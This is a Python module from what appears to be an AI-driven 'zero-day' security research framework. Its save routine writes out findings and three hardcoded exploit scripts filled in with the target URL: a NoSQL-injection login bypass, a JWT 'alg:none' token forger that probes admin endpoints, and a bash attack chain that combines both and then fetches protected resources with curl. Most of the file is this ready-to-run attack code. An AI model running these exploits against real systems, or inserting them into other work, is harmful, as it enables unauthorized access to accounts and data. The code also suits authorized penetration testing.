from __future__ import annotations

import argparse
import json
import os
from datetime import datetime
from pathlib import Path

from .orchestrator import ZeroDayOrchestrator, ZeroDayReport
from .models import ZeroDayFinding, ExploitPayload, ProofOfConcept


FINDINGS_DIR = Path(r"attack-surface\Found")


def save_findings(report: ZeroDayReport) -> Path:
    """Save zero-day findings to structured files."""
    # Create output directory
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    session_dir = FINDINGS_DIR / f"session_{timestamp}"
    session_dir.mkdir(parents=True, exist_ok=True)
    
    # Save main report
    report_file = session_dir / "REPORT.txt"
    report_file.write_text(report.final, encoding="utf-8")
    
    # Save structured findings as JSON
    findings_data = []
    for f in report.findings:
        finding_dict = {
            "id": f.id,
            "title": f.title,
            "severity": f.severity,
            "vulnerability_class": f.vulnerability_class,
            "attack_vector": f.attack_vector,
            "validation_status": f.validation_status,
            "false_positive_checks": list(f.false_positive_checks),
            "payloads": [
                {
                    "name": p.name,
                    "category": p.category,
                    "payload": p.payload,
                    "target_component": p.target_component,
                    "cve_reference": p.cve_reference,
                    "confidence": p.confidence
                }
                for p in f.payloads
            ],
            "poc": None
        }
        if f.poc:
            finding_dict["poc"] = {
                "title": f.poc.title,
                "vulnerability_type": f.poc.vulnerability_type,
                "steps": list(f.poc.steps),
                "expected_result": f.poc.expected_result,
                "actual_result": f.poc.actual_result,
                "evidence_hash": f.poc.evidence_hash,
                "verified": f.poc.verified
            }
        findings_data.append(finding_dict)
    
    findings_file = session_dir / "findings.json"
    findings_file.write_text(json.dumps(findings_data, indent=2, ensure_ascii=False), encoding="utf-8")
    
    # Save individual exploit files
    exploits_dir = session_dir / "exploits"
    exploits_dir.mkdir(exist_ok=True)
    
    # Extract target URL from report
    target_url = report.target if report.target.startswith("http") else "http://target"
    
    # Extract and save exploit code from report
    _save_exploit_files(exploits_dir, report.findings, target_url)
    
    # Save payloads as separate file
    payloads_file = session_dir / "payloads.txt"
    payload_lines = []
    for f in report.findings:
        payload_lines.append(f"# {f.id} - {f.title}")
        for p in f.payloads:
            payload_lines.append(f"{p.name}: {p.payload}")
        payload_lines.append("")
    payloads_file.write_text("\n".join(payload_lines), encoding="utf-8")
    
    # Save summary
    summary = {
        "timestamp": timestamp,
        "target": report.target,
        "status": report.status,
        "total_findings": len(report.findings),
        "validated_findings": sum(1 for f in report.findings if f.validation_status == "validated"),
        "critical_count": sum(1 for f in report.findings if f.severity == "critical"),
        "high_count": sum(1 for f in report.findings if f.severity == "high"),
        "files_generated": [
            "REPORT.txt",
            "findings.json", 
            "payloads.txt",
            "exploits/nosql_injection.py",
            "exploits/jwt_bypass.py",
            "exploits/attack_chain.sh"
        ]
    }
    summary_file = session_dir / "summary.json"
    summary_file.write_text(json.dumps(summary, indent=2), encoding="utf-8")
    
    return session_dir


def _save_exploit_files(exploits_dir: Path, findings: tuple, target_url: str = "http://target") -> None:
    """Generate and save exploit scripts with actual target URL."""
    
    # NoSQL Injection Exploit
    nosql_exploit = f'''#!/usr/bin/env python3
"""NoSQL Injection Authentication Bypass Exploit
Target: {target_url}
Generated by Attack Surface Zero-Day Framework
"""
import requests
import json
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_url}/api/v1/login"

PAYLOADS = [
    {{"username": {{"$gt": ""}}, "password": {{"$gt": ""}}}},
    {{"username": {{"$ne": None}}, "password": {{"$ne": None}}}},
    {{"username": {{"$exists": True}}, "password": {{"$exists": True}}}},
    {{"username": {{"$regex": ".*"}}, "password": {{"$regex": ".*"}}}},
    {{"username": {{"$where": "1==1"}}, "password": {{"$where": "1==1"}}}},
]

def exploit():
    print(f"[*] Target: {{TARGET}}")
    print(f"[*] Testing {{len(PAYLOADS)}} NoSQL injection payloads...")
    
    for i, payload in enumerate(PAYLOADS, 1):
        try:
            r = requests.post(
                TARGET, 
                json=payload, 
                headers={{"Content-Type": "application/json"}},
                timeout=15,
                verify=False
            )
            print(f"[{{i}}] Payload: {{json.dumps(payload)}}")
            print(f"    Status: {{r.status_code}}")
            
            if r.status_code == 200:
                print(f"[+] Got 200 response!")
                print(f"[+] Response: {{r.text[:500]}}")
                if "token" in r.text.lower():
                    print(f"[+] SUCCESS! Authentication bypassed - Token received!")
                    try:
                        return r.json().get("token") or r.json().get("access_token")
                    except:
                        return r.text
        except requests.exceptions.SSLError:
            print(f"[-] SSL Error - try with verify=False")
        except Exception as e:
            print(f"[-] Error: {{e}}")
    return None

if __name__ == "__main__":
    import urllib3
    urllib3.disable_warnings()
    
    token = exploit()
    if token:
        print(f"\\n[+] Obtained token: {{token}}")
    else:
        print("\\n[-] Exploit failed or target not vulnerable")
'''
    (exploits_dir / "nosql_injection.py").write_text(nosql_exploit, encoding="utf-8")
    
    # JWT Algorithm Confusion Exploit
    jwt_exploit = f'''#!/usr/bin/env python3
"""JWT Algorithm Confusion (None Algorithm) Exploit
Target: {target_url}
Generated by Attack Surface Zero-Day Framework
"""
import base64
import json
import requests
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_url}"

def forge_jwt(payload_data: dict) -> str:
    """Forge a JWT token with alg:none"""
    header = {{"alg": "none", "typ": "JWT"}}
    header_b64 = base64.urlsafe_b64encode(
        json.dumps(header).encode()
    ).decode().rstrip("=")
    payload_b64 = base64.urlsafe_b64encode(
        json.dumps(payload_data).encode()
    ).decode().rstrip("=")
    return f"{{header_b64}}.{{payload_b64}}."

def exploit():
    print(f"[*] Target: {{TARGET}}")
    
    payloads = [
        {{"user": "admin", "role": "superuser"}},
        {{"user": "admin", "role": "administrator", "admin": True}},
        {{"sub": "admin", "role": "root", "iat": 1234567890}},
        {{"username": "admin", "isAdmin": True}},
        {{"id": 1, "role": "admin"}},
    ]
    
    endpoints = [
        "/api/v1/profile",
        "/api/v1/admin",
        "/api/v1/users",
        "/api/profile",
        "/api/admin",
        "/admin",
        "/profile",
    ]
    
    for payload in payloads:
        token = forge_jwt(payload)
        print(f"\\n[*] Forged token for {{payload}}")
        print(f"    Token: {{token[:60]}}...")
        
        for endpoint in endpoints:
            url = f"{{TARGET}}{{endpoint}}"
            try:
                r = requests.get(
                    url,
                    headers={{"Authorization": f"Bearer {{token}}"}},
                    timeout=10,
                    verify=False
                )
                
                if r.status_code == 200:
                    print(f"[+] SUCCESS on {{endpoint}}! Token accepted")
                    print(f"[+] Status: {{r.status_code}}")
                    print(f"[+] Response: {{r.text[:300]}}")
                    return token
                elif r.status_code != 404:
                    print(f"    {{endpoint}}: {{r.status_code}}")
            except Exception as e:
                print(f"[-] Error on {{endpoint}}: {{e}}")
    
    return None

if __name__ == "__main__":
    import urllib3
    urllib3.disable_warnings()
    
    result = exploit()
    if result:
        print(f"\\n[+] Valid forged token obtained")
        print(f"[+] Token: {{result}}")
    else:
        print("\\n[-] Target may not be vulnerable to alg:none")
'''
    (exploits_dir / "jwt_bypass.py").write_text(jwt_exploit, encoding="utf-8")
    
    # Combined Attack Chain
    attack_chain = f'''#!/bin/bash
# Combined Zero-Day Attack Chain
# Target: {target_url}
# Generated by Attack Surface Zero-Day Framework
# Usage: ./attack_chain.sh [target_base_url]

TARGET="${{1:-{target_url}}}"
echo "=========================================="
echo "Zero-Day Attack Chain"
echo "Target: $TARGET"
echo "=========================================="

# Phase 1: NoSQL Injection Auth Bypass
echo ""
echo "[Phase 1] NoSQL Injection Authentication Bypass"
echo "------------------------------------------------"

# Try multiple NoSQL payloads
PAYLOADS=(
    '{{"username":{{"$gt":""}}, "password":{{"$gt":""}}}}'
    '{{"username":{{"$ne":null}}, "password":{{"$ne":null}}}}'
    '{{"username":{{"$exists":true}}, "password":{{"$exists":true}}}}'
)

TOKEN=""
for payload in "${{PAYLOADS[@]}}"; do
    echo "[*] Trying payload: $payload"
    RESPONSE=$(curl -sk -X POST "$TARGET/api/v1/login" \\
        -H "Content-Type: application/json" \\
        -d "$payload")
    
    TOKEN=$(echo "$RESPONSE" | jq -r '.token // .access_token // empty' 2>/dev/null)
    
    if [ -n "$TOKEN" ]; then
        echo "[+] SUCCESS - Got JWT token!"
        echo "[+] Token: ${{TOKEN:0:50}}..."
        break
    fi
done

if [ -z "$TOKEN" ]; then
    echo "[-] NoSQL injection failed on /api/v1/login"
    echo "[*] Trying alternative endpoints..."
    
    for endpoint in "/api/login" "/auth/login" "/login"; do
        for payload in "${{PAYLOADS[@]}}"; do
            RESPONSE=$(curl -sk -X POST "$TARGET$endpoint" \\
                -H "Content-Type: application/json" \\
                -d "$payload")
            TOKEN=$(echo "$RESPONSE" | jq -r '.token // .access_token // empty' 2>/dev/null)
            if [ -n "$TOKEN" ]; then
                echo "[+] SUCCESS on $endpoint!"
                echo "[+] Token: ${{TOKEN:0:50}}..."
                break 2
            fi
        done
    done
fi

if [ -z "$TOKEN" ]; then
    echo "[-] Could not obtain token via NoSQL injection"
    echo "[*] Attempting JWT algorithm confusion instead..."
    
    # Phase 2: JWT Algorithm Confusion
    echo ""
    echo "[Phase 2] JWT Algorithm Confusion"
    echo "----------------------------------"
    
    # Forge token with alg:none
    HEADER=$(echo -n '{{"alg":"none","typ":"JWT"}}' | base64 -w0 | tr -d '=')
    PAYLOAD=$(echo -n '{{"user":"admin","role":"superuser","admin":true}}' | base64 -w0 | tr -d '=')
    TOKEN="${{HEADER}}.${{PAYLOAD}}."
    echo "[*] Forged token: ${{TOKEN:0:50}}..."
fi

# Phase 3: Access Protected Resources
echo ""
echo "[Phase 3] Accessing Protected Resources"
echo "----------------------------------------"

ENDPOINTS=(
    "/api/v1/admin/users"
    "/api/v1/profile"
    "/api/v1/users"
    "/api/admin"
    "/api/profile"
    "/admin"
)

for endpoint in "${{ENDPOINTS[@]}}"; do
    echo "[*] Testing $endpoint..."
    RESPONSE=$(curl -sk "$TARGET$endpoint" \\
        -H "Authorization: Bearer $TOKEN" \\
        -H "Content-Type: application/json")
    
    STATUS=$(curl -sk -o /dev/null -w "%{{http_code}}" "$TARGET$endpoint" \\
        -H "Authorization: Bearer $TOKEN")
    
    if [ "$STATUS" = "200" ]; then
        echo "[+] SUCCESS on $endpoint (HTTP 200)"
        echo "[+] Response:"
        echo "$RESPONSE" | jq . 2>/dev/null || echo "$RESPONSE"
        echo ""
    fi
done

echo ""
echo "=========================================="
echo "Attack chain completed"
echo "=========================================="
'''
    (exploits_dir / "attack_chain.sh").write_text(attack_chain, encoding="utf-8")


def main() -> None:
    parser = argparse.ArgumentParser(description="Zero-day security research framework.")
    parser.add_argument("request", help="Security research request to evaluate")
    parser.add_argument("--no-save", action="store_true", help="Don't save findings to disk")
    parser.add_argument("--verbose", "-v", action="store_true", help="Show detailed verification output")
    parser.add_argument("--debate", action="store_true", help="Enable multi-agent hypothesis debate system")
    parser.add_argument("--output", "-o", type=str, help="Custom output directory")
    args = parser.parse_args()

    # Pass options to orchestrator
    report = ZeroDayOrchestrator().run(
        args.request,
        verbose=args.verbose,
        enable_debate=args.debate
    )
    print(report.final)
    
    # Save findings if not refused and not disabled
    if report.status != "refused" and not args.no_save:
        output_dir = save_findings(report)
        print(f"\n{'='*80}")
        print(f"[+] Findings saved to: {output_dir}")
        print(f"[+] Files generated:")
        for f in output_dir.iterdir():
            if f.is_file():
                print(f"    - {f.name}")
            elif f.is_dir():
                print(f"    - {f.name}/")
                for sf in f.iterdir():
                    print(f"        - {sf.name}")


if __name__ == "__main__":
    main()
